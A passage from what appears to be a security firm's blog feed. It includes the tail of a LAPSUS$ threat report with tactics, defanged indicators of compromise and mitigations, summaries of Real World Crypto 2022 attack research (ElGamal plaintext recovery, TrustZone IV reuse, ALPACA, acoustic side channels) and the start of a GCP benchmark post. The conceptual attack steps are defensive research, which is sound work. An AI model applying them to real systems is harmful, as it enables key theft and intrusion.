The main source of initial access is believed to occur via stolen authentication cookies which would grant the attacker access to a specific application. These cookies are usually in the form of Single sign-on (SSO) applications which would allow the attacker to pivot into other corporate applications ultimately bypassing controls such as multi-factor authentication (MFA).

Credential access and Privilege escalation

Credential Harvesting and privileged escalation are key components of the LAPSUS$ breaches we have seen, with rapid escalation in privileges the LAPSUS$ group have been seen to elevate from a standard user account to an administrative user within a couple of days.

In the investigations conducted by NCC Group, little to no malware is used. In one case NCC Group observed LAPSUS$ using nothing more than the legitimate Sysinternals tool ADExplorer, which was used to conduct reconnaissance on the victim’s environment.

Access to corporate VPNs is a primary focus for this group as it allows the threat actor to directly access key infrastructure which they require to complete their objectives.

In our incident response cases, we saw the threat actor leveraging compromised employee email accounts to email helpdesk systems requesting access credentials or support to get access to the corporate VPN.

Lateral Movement

In one incident LAPSUS$ were observed to sporadically move through the victim environment via RDP in an attempt to access resources deeper in the victim environment. In some instances, victim controlled hostnames were revealed including the host “VULTR-GUEST” which refers to infrastructure hosted on the private cloud service, Vultr[3].

Exfiltration

LAPSUS$’s action on objectives appears to focus on data exfiltration of sensitive information as well as destruction or disruption. In one particular incident the threat actor is observed to utilise the free file drop service “filetransfer[.]io”.

Impact

NCC Group has observed disruption and destruction to client environments by LAPSUS$ such as shutting down virtual machines from within on-premises VMware ESXi infrastructure, to the extreme of mass deletion of virtual machines, storage, and configurations in cloud environments making it harder for the victim to recover and for the investigation team to conduct their analysis activities.

The theft of data reported appears to heavily be focused on application source code or proprietary technical information. With a targeting of internal source code management or repository servers. These git repositories can contain not only commercially sensitive intellectual property, but also in some cases may include additional API keys to sensitive applications including administrative or cloud applications.

Recommendations

  • Ensure that Cloud computing environments have sufficient logging enabled.
  • Ensure that cloud administrative access is configured to prevent unauthorised access to resources and that API keys are not overly permissive to the permissions they require.
  • Utilise MFA for user authentication on both cloud and remote access solutions to help reduce the risk of unauthorised access.
  • Ensure logging is in place to record MFA device enrolment
  • Security controls such as Conditional Access can help restrict or prevent unauthorised access based on criteria such as geographical location.
  • Implement activities to detect and investigate anomalies in VPN access.
  • Ensure a system is in place to record all helpdesk queries.
  • Avoid using SMS as an MFA vector to avoid the risk of SIM swapping.
  • Securing source code environments to ensure that users can only access the relevant repositories.
  • Secret Scanning[1][2] on source code repositories should be conducted to ensure that sensitive API credentials are not stored in source code. GitHub and Gitlab offer detection mechanisms for this
  • Remote Desktop services or Gateways used as a primary or secondary remote access solution should be removed from any corporate environment in favour for alternative solutions such as secured VPNs, or other Remote Desktop applications which mitigate common attack techniques such as brute force or exploitation and can offer additional security controls such as MFA and Conditional Access.
  • Centralise logging including cloud applications (SIEM solution).
  • Offline or immutable backups of servers should be taken to ensure that in the event of a data disruption or destruction attack, services can be restored.
  • Reduce MFA token/Session cookie validity times
  • Ensure principle of least privilege for user accounts is being adhered to.
  • Social engineering awareness training for all staff.

Indicators of Compromise

Indicator Value Indicator Type Description
104.238.222[.]158 IP address Malicious Lapsus Network Address
108.61.173[.]214 IP address Malicious Lapsus Network Address
185.169.255[.]74 IP address Malicious Lapsus Network Address
VULTR-GUEST Hostname Threat Actor Controlled Host
hxxps://filetransfer[.]io Domain Free File Drop Service Utilised by the Threat Actor

MITRE ATT&CK

Technique Code Technique
T1482 Discovery – Domain Trust Discovery
T1018 Discovery – Remote System Discovery
T1069.002 Discovery – Groups Discovery: Domain Groups
T1016.001 Discovery – System Network Configuration Discovery
T1078.002 Privilege Escalation – Domain Accounts
T1555.005 Credential Access – Credentials from Password Stores: Password Managers
T1021.001 Lateral Movement – Remote Services: Remote Desktop Protocol
T1534 Lateral Movement – Internal Spearphishing
T1072 Execution – Software Deployment Tools
T1213.002 Collection – Data from Information Repositories: Sharepoint
T1039 Collection – Data from Network Shared Drive
T1213.003 Collection – Data from Information Repositories: Code Repositories
T1567 Exfiltration – Exfiltration Over Web Service
T1485 Impact – Data Destruction
T1529 Impact – System Shutdown/Reboot

References

  1. https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning
  2. https://docs.gitlab.com/ee/user/application_security/secret_detection
  3. https://www.vultr.com/

Real World Cryptography Conference 2022

26 April 2022 at 13:00

The IACR’s annual Real World Cryptography (RWC) conference took place in Amsterdam a few weeks ago. It remains the best venue for highlights of cryptographic constructions and attacks for the real world. While the conference was fully remote last year, this year it was a 3-day hybrid event, live-streamed from a conference center in charming central Amsterdam with an audience of about 500 cryptographers.

Some members of our Cryptography Services team attended in person, while others shifted their schedules by six hours to watch the talks live online. In this post, we share summaries of some of our favorite talks. Have a stroopwafel and enjoy!

An Evaluation of the Risks of Client-Side Scanning

On the second day of the conference, Matthew Green presented an extremely interesting talk based on a paper that was co-authored with Vanessa Teague, Bruce Schneier, Alex Stamos and Carmela Troncoso. He began by noting that the continued deployment of end-to-end encryption (and backup) over the past few years has only increased the concerns of the law enforcement community regarding content access. At the same time, technical opinions seem to be converging on the unsuitability of key escrow solutions for these purposes. Thus, as content transport becomes encrypted and goes dark, this naturally motivates an interest in client-side scanning technologies.

Until recently, law enforcement access requests primarily involved singular and exceptional circumstances, perhaps requiring subpoenas or other safeguards. Some may recall the FBI demanding access to domestic terrorism suspect’s phones.

However, law enforcement’s access request underwent a significant expansion in October 2019, as can be seen in US Attorney General William Barr’s (and others) open letter to Mark Zuckerberg of Facebook. The letter noted the benefits of current safety systems operating on ALL (not singular) content and how end-to-end encryption will effectively shut them down, while requesting Facebook not proceed with its plans to deploy encrypted messaging until solutions can be developed to provide lawful access. The supporting narrative has also expanded from domestic terrorism, as the letter now highlights “…illegal content and activity, such as child sexual exploitation and abuse, terrorism, and foreign adversaries‚ attempts to undermine democratic values and institutions…”. Given the benefit of perfect hindsight, the word “foreign” may have been unnecessary!

As it stands today, sent messages are generally scanned on a central server to detect suspect content by either A) a media hashing algorithm, or B) a neural network. While each approach has a variety of strengths and weaknesses, both involve proprietary and sensitive internal mechanisms that operate on unencrypted source material. The migration of this technology onto client devices is not straightforward.

One cryptographic innovation is to use two-party computation (2PC) where the client has the content, the server provides the scanning algorithm, and neither learns anything about the other unless there is a match. An example of this was published in August 2021 as the Apple PSI System. Nonetheless, Matthew Green highlighted a number of remaining risks.

Risk 1 is from mission creep. While current proposals center around child sexual abuse material (CSAM), the Barr memo clearly hints at the slippery slope leading to other content areas. In fact, the BBC reported on a similar scenario involving shifting commitments in “Singapore reveals Covid privacy data available to police“.

Risk 2 is from unauthorized surveillance. In this scenario, systems may be unable to detect if/when malicious actors inject unauthorized content into the scanning database or algorithm. There is disagreement on whether this can be reliably audited to prevent misuse or abuse.

Risk 3 is from malicious false positives. All systems produce false positives where a harmless image may trigger a detection (e.g., hash collision) event. Attempts to limit this by keeping algorithm/models/data secret are unrealistic as demonstrated by the rapid reverse engineering of Apple’s NeuralHash function as noted by Bruce Schneier.

In any event, Apple announced an indefinite delay to its deployment plans in August 2021. However, as enormous pressure remains on providing content access to law enforcement, the idea will not simply go away. As these client-side scanning technologies may represent the most powerful surveillance system ever imagined, it is imperative that we find a way to make them auditable and abuse-resistant prior to deployment.

If you are interested in finding out more, see the paper “Bugs in our Pockets: The Risks of Client-Side Scanning” at https://arxiv.org/abs/2110.07450.

— Eric Schorn

On the (in)security of ElGamal in OpenPGP

🏴‍☠️ Ahoy, everyone! 🏴‍☠️

Cryptography’s most notorious pirate 🦜, Luca De Feo, returns to Real World Crypto to discuss the dangers of ambiguity in cryptographic standards, based on his work with Bertram Poettering and Alessandro Sorniotti. In particular, the focus of the presentation (YouTube, slides) is on how flexibility in a key generation standard can result in practical plaintext recovery.

The story begins with the OpenPGP Message Format RFC 4880, which states

Implementations MUST implement DSA for signatures, and ElGamal for encryption. Implementations SHOULD implement RSA […]

Although RSA is usually the standard choice, any implementation that follows the RFC comes packaged with the option to instead use ElGamal (over a finite field, not an elliptic curve) and it’s here that lies the problem.

Unlike RSA, ECDH, or (EC)DSA, ElGamal doesn’t have a fixed standard. Instead, the protocol is usually implemented from either the original paper, or The Handbook of Applied Cryptography (Chapter 8).

ElGamal Encryption

ElGamal encryption is simple enough that we can describe it here. A public key contains a prime modulus p, a generator of a cyclic group \alpha and the public value X = \alpha^x \pmod p. The secret key is the integer x. To encrypt a message m, an ephemeral key y is randomly chosen and the ciphertext is the tuple
\displaystyle (Y = \alpha^x, \; \; X^y \cdot m).
To decrypt a message, usually one computes Y^x using knowledge of the secret key and then the message from
\displaystyle \frac{X^y \cdot m}{Y^x} = \frac{(\alpha^{x})^y \cdot m}{(\alpha^y)^x} = m \pmod p.
However, if an attacker can compute y directly, then the message can be recovered by computing X^y and dividing
\displaystyle \frac{X^y \cdot m}{X^y} = m \pmod p.

Parameter generation

The attack described below comes from interoperability of differing implementations that disagree on the assumptions made on the parameters of ElGamal encryption.

Let’s first look at how the primes can be chosen. We write our primes in the form p = 2qf + 1, with q prime. When f=1, we name the primes “safe primes”, which account for 70% of the primes found during the survey. Lim-Lee primes are those for which q and the prime factors of f = \ell_0 \ell_1 \ldots \ell_k are all large and approximately the same size. If we allow f to have arbitrary factorization, then the primes p are known as Schnorr primes.

Next up is how the generators \alpha and keys x,y can be chosen. Generally, implementations pick a primitive \alpha which generates all of the group (\mathbb{Z} / p \mathbb{Z})^\times. In these cases, the secret and ephemeral keys should be picked in the range x,y \in [1,p-1].

However, certain specifications assume that the prime p is a safe or Lim-Lee prime. In these cases, the generator \alpha instead generates a subgroup of order q and the secret and ephemeral keys can be picked to be “short”. This has the benefit of allowing encryption to be efficient, as the exponents x,y are much smaller than p.

Cross Configuration Attacks

In isolation, either of the above set-ups can be used safely. However, a vulnerability can occur when two distinct implementations interoperate running under different assumptions. The attack described is exposed when a public key that uses a Schnorr prime with a primitive generator is sent to an implementation that produces short ephemeral keys.

Precisely, if an attacker can find the factors of f = \ell_0 \ell_1 \ldots \ell_k, the ephemeral key can be computed directly by solving the discrete log problem from Y when prime factors \ell_i are small enough. Then, from each piece y_i \pmod {\ell_i} computed, the entire key y can be recovered using the Chinese remainder theorem, provided that the product of the small factors is greater than the short key: y < \prod_{i=0}^n \ell_i for some n \leq k.

Of the 800,000 ElGamal PGP public keys surveyed, 2,000 keys were exposed to practical plaintext recovery via computing the ephemeral keys when messages were encrypted using GnuPGG, Botan, Libcrypto++ or any other library implementing the short key optimization.

Side-Channels

Additionally, some ephemeral keys were leaked by side channel attacks. Generally, FLUSH+RELOAD (instruction cache) or PRIME+PROBE (data cache) were used to leak data, but additional discrete logarithms must be computed to fully recover the ephemeral keys.

In the Libcrypto++ and Go implementations, the side-channel attacks are said to be straightforward, but for GnuPG, the attacks are much harder. If the short keys are generated by GnuPG, key recovery is estimated to be within reach for nation state attackers, but for Libcrypto++, as the keys are even shorter, a lucky attacker may be able to recover the key on commodity resources.

A summary of the work, including a live demo, is available on IBM’s site, and the paper itself is available on eprint.

— Giacomo Pope

“They’re not that hard to mitigate”: What Cryptographic Library Developers Think About Timing Attacks

Ján Jančár presented a joint work with Marcel Fourné, Daniel De Almeida Braga, Mohamed Sabt, Peter Schwabe, Gilles Barthe, Pierre-Alain Fouque and Yasemin Acar. The corresponding paper has been made available on eprint. It is a survey paper that tries to investigate why timing attacks are still found in cryptographic libraries: are cryptographic library developers aware that they exist, do they try to mitigate them, do they know about existing tools and frameworks for detection and prevention of timing issues?

To answer such questions, the authors contacted 201 developers of 36 “prominent” cryptographic libraries, to fill a survey with questions about the subject, with free-text answers. Unconstrained answers were chosen because the cryptographic libraries cover a very large spectrum of target systems, usage contexts, and optimization goals (performance, portability,…) that could not be properly captured with a multiple-choice questionnaire. The paper details the methodology used for interpretation of the results. The authors draw several conclusions from the analysis of the survey results, the main one being nicely summarized by the quote in the title of the talk: developers know and care about such timing issues, but think that they are not that hard to avoid, and thus do not prioritize investigating and using tools that could help in that area.

Of course, while side-channel leaks are an objective fact that can be measured with great precision, the choice of the “right” method to avoid them during development is a lot more subjective and developers have opinions. Having been myself a participant to that survey (as the developer of BearSSL), my own opinions put me slightly at odds with their conclusion, because I don’t use tools to tell me whether I wrote constant-time code, though it is not because I would consider that problem to be “not too hard”. It is more that I took from day 1 the extreme (extremist?) stance of always knowing how my code is translated to machine instructions, and how these get executed in the silicon. This is certainly not easy to do, and it takes time to write decent code under these conditions! But it is a necessary condition in order to achieve the size optimizations (in RAM and ROM) that BearSSL aims for, as well as ensuring correctness and decent enough performance. Constant-time behavior is a natural side-effect of developing that way. In other words, I don’t need a tool to tell me whether my code is constant-time or not, because if I cannot answer that right away then I have already failed to achieve my goals (even if the executable turns out to be, indeed, constant-time). What would be most useful to me would be a way to instruct the compiler about which data elements are secret and must not be handled in a non-constant-time way, but while some toolchains begin to include such extensions, I cannot use them without compromising portability, which is another paramount goal of BearSSL.

Notwithstanding, I support all the recommendations of the authors, in particular the following:

  • Cryptographic libraries should eliminate all timing leaks, not just those that are felt to be potentially exploitable in practice (it may be noted that “security enclaves” such as Intel’s SGX or Samsung’s TrustZone are the perfect situation for a side-channel attacker, allowing exploitation of the tiniest leaks).
  • Compilers should offer ways for developers to tag secret values for which compilers should produce only constant-time code, or at least warn upon use in a non-constant-time construction. Such tagging should furthermore be standardized as much as possible, de facto if not de jure, so that portability issues don’t prevent its use.
  • Standardization bodies should mandate use of constant-time code, at least for cryptographic operations. Ideally, other standardization bodies should also require adequate support, in the programming languages, and instruction set architectures.

An unfortunate reality is that even getting the compiler to issue an instruction sequence that seems constant-time is only a part of the question. The underlying hardware will often execute operations in a way that adheres to the abstract model of the advertised architecture, but may introduce timing-based side channels; this is an increasing cause of concern, as hardware platforms become larger and more complicated, and may now include themselves arbitrary translation layers, including JIT compilers, undocumented and hidden from the application developers. In the long-term, only a fully vertical approach, with guarantees at all layers from the programming language to the transistor, may provide a strong solution to timing-based side channels.

— Thomas Pornin

Zero-Knowledge Middleboxes

Paul Grubbs presented his and co-workers’ work on Zero-Knowledge Middleboxes, enabling privacy-preserving enforcement of network policies using zero-knowledge protocols. Middleboxes are systems that mediate communications between other systems, to perform a number of services, including inspection, transformation and filtering of network traffic. They are commonly found in corporate environments, universities, ISPs, etc. and in any environments that typically require enforcement of certain policies, mostly for compliance, security and performance purposes, or to share network resources amongst several devices. When middleboxes are employed for compliance and security in a given environment, their services conflict with users’ privacy (and potentially — and counter-intuitively — with the security of information exchanged between mediated systems, because of the reliance on vendors’ middleboxes and meddler-in-the-middle infrastructure’s secure implementation, for instance).

Paul Grubbs et al. propose to address this seemingly irreconcilable difference with zero-knowledge proof (ZKP) methods, so middlebox users can have both privacy and policy enforcement. They set out the following objectives for their research:

  1. Don’t weaken encryption.
  2. Network environment/Middleboxes can enforce policies as they did before.
  3. No server changes should be required.

Furthermore, circumvention should be still possible via “inner” encryption (VPN/Tor/etc.).

In a zero-knowledge proof protocol, one party, the prover, proves to another party, the verifier, that a statement is true, while preserving confidentiality of information. Zero-knowledge proofs satisfy several properties:

  • Completeness: if both proof and verification are correct, and if the statement is true, then the prover is convinced of the fact provided in the statement.
  • Soundness: a malicious prover cannot convince the verifier of a false statement.
  • Zero-knowledge: a malicious verifier cannot access confidential information.

Paul described a solution architecture centered around a zero-knowledge middlebox, in which:

  • A client joins the managed network, and gets the policy that is to be enforced.
  • The client and server establish key material, and encrypt traffic as usual, e.g. using TLS 1.3.
  • The client sends the encrypted traffic and a statement that the ciphertext contains compliant traffic.
  • The managed network middlebox verifies the proof, and blocks traffic on failure, otherwise it passes the encrypted traffic to the server and back.

It was not clear whether the solution would work or not for Paul and his team, when it was initially fleshed out. It relied on adapting the zero-knowledge “machinery” with complex protocols such as TLS 1.3, and its key schedule. However, they found that ZKPs applied to TLS 1.3 are close to practical, an exciting outcome of their research.

Paul then proceeded with describing the solution in more detail, specifically circuit models for zero-knowledge middleboxes (ZKMB). He explained that building a ZKMB is to construct a circuit, with a three-step pipeline:

  1. Channel opening: decrypt ciphertext, and output message.
  2. Parse + extract: find and output relevant data from message.
  3. Policy check: verify data is compliant.

Paul described how they applied these steps to TLS 1.3, to determine if the decrypted plaintext is compliant with a given policy, and to DNS-over-HTTPS and DNS-over-TLS (respectively DoH and DoT), to filter out unauthorized encrypted DNS queries.

One of the sample challenges that Paul and his team had to address, was how to provide a key consistency proof, because TLS record decryption is not bound to a given key. (Paul worked on similar challenges before.) This was achieved at a high level, with judicious use of the TLS 1.3 message and handshake transcript, as components of the ZK proof.

The team managed to fulfill the objectives they set out at the beginning of their research:

  1. Don’t weaken encryption: use standard encryption, and the zero-knowledge property of ZKPs to conceal private information.
  2. Network environments/Middleboxes can enforce policies as they did before, using ZKPs’ soundness property. Clients cannot bypass middleboxes, and the soundness property prevents clients from lying.
  3. No server changes, facilitating easier deployment of the solution. Middleboxes don’t need to forward proofs to servers.

And (internet censorship) circumvention is still possible.

They achieved these goals with close to practical performance. For instance, in their encrypted DNS case study, they managed to generate a proof of policy compliance in 3 seconds. Further work on improving performance is already showing great promises.

This is great research work, with an obvious positive impact on privacy, and possibly an improvement on the security and reliability of access to resources gated by middleboxes, in which they do not have to interfere with encrypted traffic, with inline decryption, parsing and re-encryption of traffic.

— Gérald Doussot

Drive (Quantum) Safe! — Towards Post-Quantum Security for Vehicle-to-Vehicle Communications

Nina Bindel presented joint work with Sarah McCarthy, Hanif Rahbari, and Geoff Twardokus that outlines practical steps that can be taken to bring post-quantum (PQ) security to connected vehicle messaging. Vehicle-to-vehicle (V2V) communication encompasses applications where vehicles exchange situational awareness information in the form of Basic Safety Messages (BSMs) containing data such as location, heading, velocity, acceleration, and braking status over a wireless channel. Widespread adoption of V2V could prevent or decrease the severity of accidents, reduce congestion, and improve driving efficiency leading to less pollution. Clearly, these benefits can only be realized if V2V messages are authentic and trustworthy.

In brief:

  1. Communication is broadcast-based wireless (variant of WiFi or cellular);
  2. BSMs are broadcast at a rate of 10 per second;
  3. BSMs are authenticated using IEEE 1609.2 certificates with ECDSA signatures;
  4. Signed BSMs must be small (< 2304 bytes) and fast (~1ms generation/verification);
  5. Vehicles rotate their certificate every few minutes for privacy reasons;
  6. Certificates are only valid for 1 week, then discarded;
  7. Certificates are only included with a signed BSM every 5 messages;
  8. Vehicles currently have an average lifespan of 15+ years;
  9. ECDSA is vulnerable to quantum attacks.

In light of the above, the authors consider the challenge of providing post-quantum protection without compromising on the existing application requirements. The size constraint of 2304 bytes includes the BSM data, the signature/metadata, and the certificate/public key when necessary. Therefore, the authors conclude that a naive replacement of ECDSA with any existing PQ scheme is simply not possible.

As a first step, a hybrid approach is proposed. Each classical ECDSA-based certificate is paired with a PQ certificate using Falcon. During BSM transmission that includes a certificate, both the ECDSA and Falcon certificates are included, along with only an ECDSA signature. This allows both certificates to be communicated without violating the size constraints, but without providing PQ security on this particular message. In all other messages, a hybrid signature is included, such that the resulting signature is valid if either at least one of the classical or PQ signatures are secure. Therefore, once certificates are communicated, the remaining messages achieve PQ security. This comes at the cost of increasing the resulting message size by a factor of 5-6, with signed BSMs increasing from ~144 bytes to ~834 bytes.

To improve on the hybrid proposal, the authors propose a partially-PQ hybrid. Under the observation that CA keys are somewhat long-lived, but the keys used to sign BSMs are only used for short durations during a 1-week period, the authors propose continuing to sign BSMs with a classical ECDSA key, but to certify these ECDSA keys using a PQ scheme. In order to launch a successful attack, a quantum adversary would need to compromise the ECDSA private key during this short usage window, and would not gain the ability to certify adversarially-controlled keys. To maintain flexibility and the ability to use a PQ algorithm where the PQ certificate size may exceed the maximum BSM size, the PQ certificate may be fragmented and sent in pieces alongside with consecutive BSMs. Under this approach, all BSMs are signed with the ECDSA key to provide classical security, and after sufficiently many BSMs are received, a PQ signature certifying the ECDSA key is established.

The proposed solutions are interesting because they remain within the constraints established by existing standards. The overhead required to accommodate the partially-PQ approach does substantially impact the theoretical performance of V2V messaging, but an optimized partially-PQ approach can still achieve ~60% of the throughput of the classical system, despite the much greater key sizes required by PQ approaches. While there may be several more challenges in bringing PQ security to connected vehicle communications, this presentation provides solid first steps in realizing this outcome.

— Kevin Henry

ALPACA: Application Layer Protocol Confusion – Analyzing and Mitigating Cracks in TLS Authentication

In this talk, Marcus Brinkmann presented the ALPACA attack, which exploits misconfigurations of TLS servers to negate web security by reflecting TLS requests to servers running non-intended applications. For example, they show that in some realistic scenarios, such as when a wildcard certificate is used by both an HTTP and an FTP server for TLS server authentication, an attacker can redirect an HTTP request to an FTP server instead and use this to steal cookies or to allow the execution of arbitrary code on the client device (who believes it came from the HTTP server). Their team focused on the case of redirecting HTTP requests to SMTP, IMAP, POP3, or FTP servers, but note that redirection attacks are possible between other pairs of applications as well.

The idea behind the ALPACA attack is not new — according to their website, this attack vector was known since 2001 and was exploited in an attack against a specific implementation in 2015. However, this talk generalized this idea, by formalizing it as a class of cross-protocol attacks, and did an internet-wide scan of servers running these TLS applications that show that there is still a large number (>100,000) of vulnerable servers.

As mitigations, the authors suggest using cryptographic mitigations instead of addressing this attack at the application layer: they show that it is possible to use the strict Application Layer Protocol Negotiation (ALPN) and Server Name Indication (SNI) extensions in TLS to prevent this attack, despite the fact that neither of these extensions was originally intended as a security measure for TLS.

This talk demonstrates how protocols that have been proven secure can still be targeted by attacks, by considering scenarios outside of the scope of the proof. Additionally, it highlights how difficult it is to mitigate attacks on the internet at large, even if they’ve been known for a long time. On the flip side, it also provides a silver lining — by showing how our existing tools sometimes already do (or can easily be modified to do) more than we originally designed them for.

— Elena Bakos Lang

Lend Me Your Ear: Passive Remote Physical Side Channels on PCs

In the last, and arguably most glamorous, talk of the conference’s first session, Daniel Genkin and Roei Schuster presented a very real-world demonstration of a physical side-channel attack. Their talk was based on research to be presented at the upcoming Usenix Security ’22 conference, and showed how built-in microphones in commodity PCs capture electromagnetic leakage that can be used to perform impressive side-channel attacks.

Side-channel attacks can broadly be placed in two categories: attacks exploiting software-based side-channels (such as microarchitectural attacks, including Spectre and Meltdown, or timing attacks exploiting timing differences in the processing of sensitive data), and physical side-channel attacks where the leakage emitted by a processing component can be used to extract sensitive information (examples of leakages include the power consumption of a device, or electromagnetic emanations).

While physical side-channel attacks can be extremely powerful — they are essentially passive attacks that require only measuring the target’s emissions — they are sometimes swept under the rug since they require physical proximity to the victim’s computer. In this talk, the speakers presented a remote physical side-channel attack which can be carried out without running any code on the victim’s machine.

This research sprouted from an interesting observation: modern-day laptops have an internal microphone which is physically wired to the motherboard of the computer. That motherboard also hosts the processor, which emits electromagnetic radiations. The wiring of that microphone essentially acts as an electromagnetic probe, which then picks up small emanations produced by the processor. Since microphone input is nowadays frequently transmitted over the internet (think, for example, audio being transmitted by VoIP or conferencing software), that side-channel leakage may be observed remotely.

As a demonstration, Daniel proceeded to display the spectrogram (i.e. the graph of frequencies over time) of the signal captured in real-time by a laptop’s microphone. In addition to picking up the voice of the speaker on the lower end of the frequency spectrum, some patterns in the high-frequency spectrum could be observed, stemming from the electromagnetic emissions of the processor. By running a demo program performing some heavy processor operations, the speaker highlighted how the shape of these high-frequency patterns changed, clearly indicating that the processor’s emissions was dependent on the computation being performed. The second speaker, Roei, then proceeded to showcase three remote attacks leveraging this novel side-channel leakage.

In a first example, Roei demonstrated an attack in which an adversary could remotely identify the website that a victim visited. To do so, a neural network was trained to classify the different leakage patterns produced when accessing different websites by the victim’s device remotely, only based on the processor’s electromagnetic emissions.

In a second example, the speaker presented a cryptographic key extraction attack on ECDSA. This scenario was a little more complex in that it leveraged an implementation with a known timing side-channel leakage in the ECDSA nonce scalar multiplication operation, and also required the usage of deterministic ECDSA RFC 6979 in order to obtain enough information to correctly implement the attack. However, the researchers were able to successfully mount an attack extracting the secret key from leakage traces of around 20k signed messages.

The third example showcased how this side-channel leakage could also be used to gain a competitive advantage when playing video games. In a recorded demonstration, the speaker showed an instance of the video game Counter-Strike, where an attacker and a victim were competing against each other while also being connected via VoIP (a seemingly likely scenario in the competitive video game community). The attack essentially exploits the fact that a player’s machine renders the opponent’s avatar even if that opponent is not in the visual field of that player. Since rendering is a processor-heavy operation, the attacker is able to gain an advantage in the game by determining the player’s proximity only by observing the electromagnetic emissions from the victim’s processor!

This talk presented some impressive new results on remote side-channel leakage and demonstrated three real-world attacks that are worth watching, paving the way for exciting future work.

— Paul Bottinelli

CHIP and CRISP — Password-based Key Exchange: Storage Hardening Beyond the Client-Server Setting

Eyal Ronen spoke about his work (with Cas Cremers, Moni Naor, and Shahar Paz) on password-authenticated key exchange (PAKE) protocols in the symmetric setting. We’ve been told many times over the years that passwords are “dead” — and yet, as Eyal pointed out, they are still the most ubiquitous form of authentication.

CHIP and CRISP are protocols that allow two parties to use a (possibly low-entropy) password to derive a shared secret key without needing to re-enter the plaintext password as input every time. They are designed for a symmetric, many-to-many setting: each entity (device) knows the password, and any device can initiate the protocol with any other device. (Compare this with the asymmetric, client-server setting where only the client knows the password.)

CHIP (Compromise Hindering Identity-based PAKE) and CRISP (Compromise Resilient Identity-based Symmetric PAKE) are “identity-based” PAKEs designed to be resistant to key compromise impersonation attacks: compromising one device does not allow impersonating other parties to that device.

CRISP, which the rest of this section will focus on, is a strong PAKE: whatever derivative of the password is stored on the devices resists pre-computation attacks. Resistance to such attacks is particularly important when passwords are involved, since password distributions mean these attacks would scale well.

Each device generates a password file in a one-time process after which the password can be deleted (and does not need to be re-input). This process uses a device’s identity, which is a (not necessarily unique) tag. Specifically, in CRISP, the device with identity id and password pwd stores {g_2}^{x} (a salt), H_1(\texttt{pwd})^{x} (a salted password hash), and H_2(\texttt{id})^{x} (a salted identity hash).

When two devices want to establish an authenticated channel, they first perform a kind of identity-based key agreement using the salted values in their password file blinded by a session-specific random value. This is a Diffie-Hellman style exchange, plus some pairings, to establish a shared secret and verify each other’s identity. The shared secret is then fed into any symmetric PAKE protocol (such as CPace) to get the final shared key.

This structure makes it clear why CRISP is called a compiler that transforms a symmetric PAKE into one that’s identity-based and resilient to compromise. But why is the PAKE necessary to obtain the shared key when the step before allows the two parties to compute a shared secret? The paper describes (in section 6.3) how replacing the PAKE with a KDF would not be secure, as it would allow an adversary to make multiple offline passwords guesses based on just one key agreement step with another party. Whether the full strength of a symmetric PAKE is needed is unclear (and possibly future work!).

Perhaps one of the trickiest practical aspects of identity-based PAKEs is handling identities: since there is no (central) key distribution center, any party that knows the password can claim to have any identity. This would make it difficult to provide effective revocation.

For the details of CHIP and CRISP, see the paper on eprint. You can also check out the authors’ implementations of CHIP and CRISP on GitHub.

— Marie-Sarah Lacharité

Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Cryptographic Design

Alon Shakevsky demonstrated ways in which a closed-source TrustZone that is deployed at Android’s massive scale (approximately 100 million Samsung devices) can have well-known vulnerabilities that go unnoticed for many years. This talk presented the research that Alon published along with Eyal Ronen and Avishai Wool. To carry out this research, they first reverse-engineered Android’s hardware-backed keystore and demonstrated that an IV reuse attack was possible, then they examined the impact of this finding in higher level protocols. They also demonstrated that the version that used proper randomness was still susceptible to a downgrade attack that made it just as vulnerable.

As is common with Trusted Execution Environment (TEE) designs, all cryptographic key materials (mostly used for signing or encryption) must reside inside the TrustZone. However, according to this research, in some Samsung Galaxy devices, there was support for exporting the encrypted key blobs. The question now became, how’s this key encryption key (referred to as a Hardware Derived Key or HDK in the slides) generated? It turns out that a permanent device-unique 256-bit AES key called the Root Encryption Key (REK) along with a salt and IV were used to derive this key: encrypted_blob = AES-GCM(HDK = KDF(REK, salt), IV, key_material). As Alon pointed out, this is a fragile construction since if the HDK is static in an application, then it becomes highly vulnerable to an IV reuse attack. Then the next question is, how are the salt and IV chosen? In 2 out of 3 versions that were examined, the salt was derived from application-provided ID and data, and the IV was also provided by the application. Given this construction, a privileged attacker who observes the encrypted_blob for key A can extract its IV and salt and use them to fabricate the encrypted_blob for a known key B. The final step is to XOR the two encrypted_blobs (i.e. the ciphertexts of keys A and B) with key B (in plaintext) to recover key A.

Once details of the IV reuse attack were worked out, Alon proceeded to describe the extent of the exploits that are possible without a user’s involvement. The story gets more painful when you learn that, in an attempt to provide backwards compatibility, the version that used randomized salts (V20-s10) was in fact susceptible to a downgrade attack.

The key takeaway messages are:

  1. If AES in GCM mode must be used in an application, use a nonce misuse resistant variant such as AES-GCM-SIV to prevent IV reuse. Or, always generate a random IV without exposing it in the API.
  2. Never allow clients to choose the encryption version and downgrade to a latent code path. This is especially important if backwards compatibility is a requirement.

As Alon pointed out towards the end of his talk, this research demonstrated the downside of composable protocols, such as WebAuth, which allow key attestation via a hardware keystore that could be compromised: once the vulnerability is disclosed, servers have no way of verifying whether a given certificate was generated on a vulnerable device or not. In addition, the closed source and vendor-specific TEE implementations enable these types of issues to go unnoticed for an extended time period. Alon indicated that he advocates for a uniform open standard by Google for the Keymaster Hardware Abstraction Layer and Trusted Applications to close this gap.

Finally, their paper “Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Keymaster Design” on eprint demonstrates a working FIDO2 WebAuth login bypass and a compromise of Google’s Secure Key Import. The appendix section provides some insights and code snippets that could be helpful for future research in this area. It is worth mentioning that Samsung has already patched their devices and issued 2 CVEs that are relevant to this work: CVE-2021-25444 for the IV reuse vulnerability and CVE-2021-25490 for the downgrade attack.

— Parnian Alimi

Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark

20 April 2022 at 16:47

As one of the proud contributors to the newest version of the CIS Google Cloud Platform Foundation Benchmark, I wanted to raise awareness about the new version release of this benchmark [1] by the Center for Internet Security (CIS) and how it can help a company to set a strong security baseline or foundation for their Google Cloud environment. As we have seen previously in our Shaking The Foundation of An Online Collaboration Tool blog post [3], the CIS Microsoft 365 Security Foundation Benchmark (to which we also contributed) was very helpful in setting the baseline security that organizations should aim to have for Microsoft 365 deployments.

